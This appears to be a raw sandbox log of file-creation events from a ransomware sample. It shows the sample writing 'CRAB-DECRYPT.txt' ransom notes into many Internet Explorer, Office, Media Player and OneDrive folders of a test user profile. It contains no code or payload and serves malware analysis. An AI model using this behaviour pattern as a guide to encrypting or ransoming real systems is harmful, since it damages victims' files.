Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DOMStore\0IPER52U\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DOMStore\BZMP202C\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DOMStore\EU700QP2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DOMStore\YWTG9C16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\EmieSiteList\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\EmieUserList\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\EUPP\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\ie4uinit-UserConfig.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\IECompatData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\IEFlipAheadCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\imagestore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\imagestore\o2e7lod\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\imagestore\v2a1n8m\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Recovery\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Recovery\Active\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Recovery\Last Active\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\TabRoaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-1055582590\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-13849261960\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-14780564560\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-14780564610\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-14780569370\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-18110748030\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-19904609010\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-314712940\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-4085800870\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-706976130\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-7404745920\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-8427938880\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-9449249960\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin15686110540\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin17161738060\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin19620886520\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin20075419400\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin20075423150\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin21042551290\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin2327546390\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin3769534880\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin4101377530\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tracking Protection\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\VersionManager\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\en-US\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Transcoded Files Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\BackstageInAppNavCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\WebServiceCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\WebServiceCache\AllUsers\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\Wef\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\Wef\AppCommands\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{94EAEC45-055E-40D3-AC7E-1317913A835B} (1) - 3100 - mspub.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{94EAEC45-055E-40D3-AC7E-1317913A835B} (1) - 3100 - mspub.exe - OTeleMediumCost.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{94EAEC45-055E-40D3-AC7E-1317913A835B} (2) - 3100 - mspub.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{9563EC4C-BF03-4AA4-ABB5-7395066C012E} (0) - 1432 - winword.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{9563EC4C-BF03-4AA4-ABB5-7395066C012E} (0) - 1432 - winword.exe - OTeleMediumCost.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{9563EC4C-BF03-4AA4-ABB5-7395066C012E} (1) - 1432 - winword.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{9563EC4C-BF03-4AA4-ABB5-7395066C012E} (1) - 1432 - winword.exe - OTeleMediumCost.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{9563EC4C-BF03-4AA4-ABB5-7395066C012E} (2) - 1432 - winword.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{99EF5110-2E92-4433-B206-F9A1D9F0BE82} (0) - 3932 - powerpnt.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{99EF5110-2E92-4433-B206-F9A1D9F0BE82} (0) - 3932 - powerpnt.exe - OTeleMediumCost.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{99EF5110-2E92-4433-B206-F9A1D9F0BE82} (1) - 3932 - powerpnt.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{99EF5110-2E92-4433-B206-F9A1D9F0BE82} (1) - 3932 - powerpnt.exe - OTeleMediumCost.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{99EF5110-2E92-4433-B206-F9A1D9F0BE82} (2) - 3932 - powerpnt.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.6743.1212\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\adm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\af\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\am-et\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\amd64\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\arm64\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\as-in\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\az-latn-az\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\be\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\bg\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\bn-bd\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\bn-in\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\bs-latn-ba\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ca\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
